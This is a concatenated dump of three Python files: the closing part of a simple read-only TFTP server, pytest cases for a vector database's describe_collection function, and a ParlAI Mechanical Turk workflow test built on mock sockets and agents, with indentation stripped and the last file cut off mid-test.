transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# if no data was read, read returns b'', then EOF was reached and download complete
else:
# sending a packet of zero data - to acknowledge end of transfer
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number
client_dedicated_sock.sendto(packet, addr)
logger.warning('download complete, closing socket')
client_dedicated_sock.close()
break
# if the block number doesn't match, means data sent was not received
# here you can just resend the data you already read because, no need for seek or another read
# because you already read it and it was not received, doing seek or read would slow down tftp
elif block_number != acked_block:
# decrement block number
block_number = block_number - 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 21)
error_message = b"incorrect TID\0"
logger.error("incorrect TID")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 20)
error_message = b"illegal operation specified\0"
logger.error("illegal operation specified")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
# listen for a client response for 10 seconds
# close everything and terminate if no response
try:
pkt, addr = client_dedicated_sock.recvfrom(
self.BUFFER_SIZE)
except:
logger.error("Socket Timed Out")
client_dedicated_sock.close()
logger.error('closed socket')
break
except FileNotFoundError:
# send an error packet to the requesting host
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 17)
error_message = b"No such file within the directory\0"
logger.error("No such file within the directory")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
client_dedicated_sock.close()
def join(self):
self.tftp_thread.join()
def do_tftpd(data_dir, connection_address, tftp_port):
""" this is a simple TFTP server that will listen on the specified
port and serve data rooted at the specified data. only read
requests are supported for security reasons.
"""
logger.warning("Starting TFTP...")
srvr = TFTPServer(data_dir, tftp_port, connection_address)
srvr.start()
srvr.join()
logger.warning("TFTP is terminating")
if __name__ == "__main__":
do_tftpd()
|
test_describe_collection.py
|
import pytest
import logging
import time
from utils import *
from constants import *
uid = "describe_collection"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
'''
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.level(2)
def test_describe_collection_without_connection(self, collection, dis_connect):
'''
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_describe_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by describe_collection method
expected: False
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_describe_collection_multithread(self, connect):
'''
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
'''
threads_num = 4
threads = []
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
'''
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.level(2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
|
test_full_system.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import time
import uuid
import os
from unittest import mock
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.agents import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.mturk_manager as MTurkManagerFile
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.shared_utils as shared_utils
import threading
from websocket_server import WebsocketServer
import json
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.input = mock.MagicMock()
# Lets ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
MESSAGE_ID_3 = 'MESSAGE_ID_3'
MESSAGE_ID_4 = 'MESSAGE_ID_4'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE, AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING, AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE, AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED, AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
TASK_GROUP_ID_1 = 'TASK_GROUP_ID_1'
SocketManager.DEF_MISSED_PONGS = 1
SocketManager.HEARTBEAT_RATE = 0.4
SocketManager.DEF_DEAD_TIME = 0.4
SocketManager.ACK_TIME = {Packet.TYPE_ALIVE: 0.4,
Packet.TYPE_MESSAGE: 0.2}
shared_utils.THREAD_SHORT_SLEEP = 0.05
shared_utils.THREAD_MEDIUM_SLEEP = 0.15
MTurkManagerFile.WORLD_START_TIMEOUT = 2
TOPIC_ARN = 'topic_arn'
QUALIFICATION_ID = 'qualification_id'
HIT_TYPE_ID = 'hit_type_id'
MTURK_PAGE_URL = 'mturk_page_url'
FAKE_HIT_ID = 'fake_hit_id'
def assert_equal_by(val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert time.time() - start_time < max_time, \
"Value was not attained in specified time"
time.sleep(0.1)
class MockSocket():
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.should_heartbeat = True
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(
client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['content']['type'] == 'heartbeat':
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(client, json.dumps({
'type': data_model.SOCKET_ROUTE_PACKET_STRING,
'content': pong,
}))
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
assignment_id = packet_dict['content']['assignment_id']
use_func = self.handlers.get(
receiver_id + assignment_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket,
name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class MockAgent(object):
"""Class that pretends to be an MTurk agent interacting through the
webpage by simulating the same commands that are sent from the core.html
file. Exposes methods to use for testing and checking status
"""
def __init__(self, hit_id, assignment_id, worker_id,
task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.ws = None
self.always_beat = True
self.send_acks = True
self.ready = False
self.wants_to_send = False
self.acked_packet = []
self.incoming_hb = []
self.message_packet = []
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
self.ws.send(json.dumps({
'type': event_name,
'content': packet.as_dict(),
}))
def register_to_socket(self, ws):
handler = self.make_packet_handler()
self.ws = ws
self.ws.handlers[self.worker_id + self.assignment_id] = handler
def on_msg(self, packet):
self.message_packet.append(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
self.ready = False
self.conversation_id = packet.data['conversation_id']
self.id = packet.data['agent_id']
self.send_alive()
def make_packet_handler(self):
"""A packet handler that properly sends heartbeats"""
def on_ack(*args):
self.acked_packet.append(args[0])
def on_hb(*args):
self.incoming_hb.append(args[0])
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
self.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
if self.always_beat:
self.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
if self.send_acks:
self.send_packet(packet.get_ack())
self.on_msg(packet)
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def build_and_send_packet(self, packet_type, data):
msg = {
'id': str(uuid.uuid4()),
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data
}
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
if (packet_type == Packet.TYPE_ALIVE):
event_name = data_model.SOCKET_AGENT_ALIVE_STRING
self.ws.send(json.dumps({
'type': event_name,
'content': msg,
}))
return msg['id']
def send_message(self, text):
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False
}
self.wants_to_send = False
return self.build_and_send_packet(Packet.TYPE_MESSAGE, data)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id
}
return self.build_and_send_packet(Packet.TYPE_ALIVE, data)
def send_heartbeat(self):
"""Sends a heartbeat to the world"""
hb = {
'id': str(uuid.uuid4()),
'receiver_id': '[World_' + self.task_group_id + ']',
'assignment_id': self.assignment_id,
'sender_id': self.worker_id,
'conversation_id': self.conversation_id,
'type': Packet.TYPE_HEARTBEAT,
'data': None
}
self.ws.send(json.dumps({
'type': data_model.SOCKET_ROUTE_PACKET_STRING,
'content': hb,
}))
def wait_for_alive(self):
last_time = time.time()
while not self.ready:
self.send_alive()
time.sleep(0.5)
assert time.time() - last_time < 10, \
'Timed out wating for server to acknowledge {} alive'.format(
self.worker_id
)
class TestMTurkManagerWorkflows(unittest.TestCase):
'''Various test cases to replicate a whole mturk workflow'''
def setUp(self):
# Mock functions that hit external APIs and such
self.server_utils = MTurkManagerFile.server_utils
self.mturk_utils = MTurkManagerFile.mturk_utils
self.server_utils.setup_server = \
mock.MagicMock(return_value='https://127.0.0.1')
self.server_utils.setup_legacy_server = \
mock.MagicMock(return_value='https://127.0.0.1')
self.server_utils.delete_server = mock.MagicMock()
self.mturk_utils.setup_aws_credentials = mock.MagicMock()
self.mturk_utils.calculate_mturk_cost = mock.MagicMock(return_value=1)
self.mturk_utils.check_mturk_balance = \
mock.MagicMock(return_value=True)
self.mturk_utils.create_hit_config = mock.MagicMock()
self.mturk_utils.setup_sns_topic = mock.MagicMock(
return_value=TOPIC_ARN)
self.mturk_utils.delete_sns_topic = mock.MagicMock()
self.mturk_utils.delete_qualification = mock.MagicMock()
self.mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID)
self.mturk_utils.find_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID)
self.mturk_utils.give_worker_qualification = mock.MagicMock()
self.mturk_utils.remove_worker_qualification = mock.MagicMock()
self.mturk_utils.create_hit_type = mock.MagicMock(
return_value=HIT_TYPE_ID)
self.mturk_utils.subscribe_to_hits = mock.MagicMock()
self.mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=(MTURK_PAGE_URL, FAKE_HIT_ID, 'MTURK_HIT_DATA'))
self.mturk_utils.get_mturk_client = mock.MagicMock(
return_value=mock.MagicMock())
self.onboarding_agents = {}
self.worlds_agents = {}
# Set up an MTurk Manager and get it ready for accepting workers
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 1
self.opt['hit_title'] = 'test_hit_title'
self.opt['hit_description'] = 'test_hit_description'
self.opt['task_description'] = 'test_task_description'
self.opt['hit_keywords'] = 'test_hit_keywords'
self.opt['reward'] = 0.1
self.opt['is_debug'] = True
self.opt['log_level'] = 0
self.opt['num_conversations'] = 1
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt,
mturk_agent_ids=self.mturk_agent_ids,
is_test=True,
)
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager.setup_server()
self.mturk_manager.start_new_run()
self.mturk_manager.ready_to_accept_workers()
self.mturk_manager.set_onboard_function(self.onboard_agent)
self.mturk_manager.create_hits()
def assign_worker_roles(workers):
workers[0].id = 'mturk_agent_1'
workers[1].id = 'mturk_agent_2'
def run_task_wait():
self.mturk_manager.start_task(
lambda w: True, assign_worker_roles, self.run_conversation)
self.task_thread = threading.Thread(target=run_task_wait)
self.task_thread.start()
self.agent_1 = MockAgent(TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1, TASK_GROUP_ID_1)
self.agent_1_2 = MockAgent(TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_1, TASK_GROUP_ID_1)
self.agent_2 = MockAgent(TEST_HIT_ID_2, TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2, TASK_GROUP_ID_1)
def tearDown(self):
self.agent_1.always_beat = False
self.agent_2.always_beat = False
for key in self.worlds_agents.keys():
self.worlds_agents[key] = True
self.mturk_manager.shutdown()
self.fake_socket.close()
self.task_thread.join()
def onboard_agent(self, worker):
self.onboarding_agents[worker.worker_id] = False
while ((worker.worker_id in self.onboarding_agents) and
(self.onboarding_agents[worker.worker_id] is False)):
time.sleep(0.05)
return
def run_conversation(self, mturk_manager, opt, workers):
for worker in workers:
self.worlds_agents[worker.worker_id] = False
for worker in workers:
while self.worlds_agents[worker.worker_id] is False:
time.sleep(0.05)
for worker in workers:
worker.shutdown(timeout=-1)
def alive_agent(self, agent):
agent.register_to_socket(self.fake_socket)
agent.wait_for_alive()
agent.send_heartbeat()
def test_successful_convo(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
def test_disconnect_end(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Disconnect agent
agent_2.always_beat = False
assert_equal_by(agent_1_object.get_status,
AssignState.STATUS_PARTNER_DISCONNECT, 3)
assert_equal_by(agent_2_object.get_status,
AssignState.STATUS_DISCONNECT, 3)
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_2.always_beat = True
agent_2.send_alive()
# Assert workers get the correct command
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_INACTIVE_DONE]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_INACTIVE_HIT]
), 1, 2)
# assert conversation not marked as complete
self.assertEqual(manager.completed_conversations, 0)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
def test_expire_onboarding(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 10)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 10)
self.onboarding_agents[agent_1.worker_id] = True
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_EXPIRED)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 1, 10)
def test_reconnect_complete(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Simulate reconnect to task
stored_conv_id = agent_2.conversation_id
stored_agent_id = agent_2.id
agent_2.conversation_id = None
agent_2.id = None
agent_2.send_alive()
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_RESTORE_STATE]
), 1, 4)
self.assertEqual(agent_2.id, stored_agent_id)
self.assertEqual(agent_2.conversation_id, stored_conv_id)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
def test_attempt_break_unique(self):
manager = self.mturk_manager
unique_worker_qual = 'is_unique_qual'
manager.is_unique = True
manager.opt['unique_qual_name'] = unique_worker_qual
manager.unique_qual_name = unique_worker_qual
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
# ensure qualification was 'granted'
self.mturk_utils.find_qualification.assert_called_with(
unique_worker_qual, manager.is_sandbox)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_1.worker_id, QUALIFICATION_ID, None, manager.is_sandbox)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_2.worker_id, QUALIFICATION_ID, None, manager.is_sandbox)
# Try to alive with the first agent a second time
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(
lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
assert_equal_by(lambda: len(
[p for p in agent_1_2.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
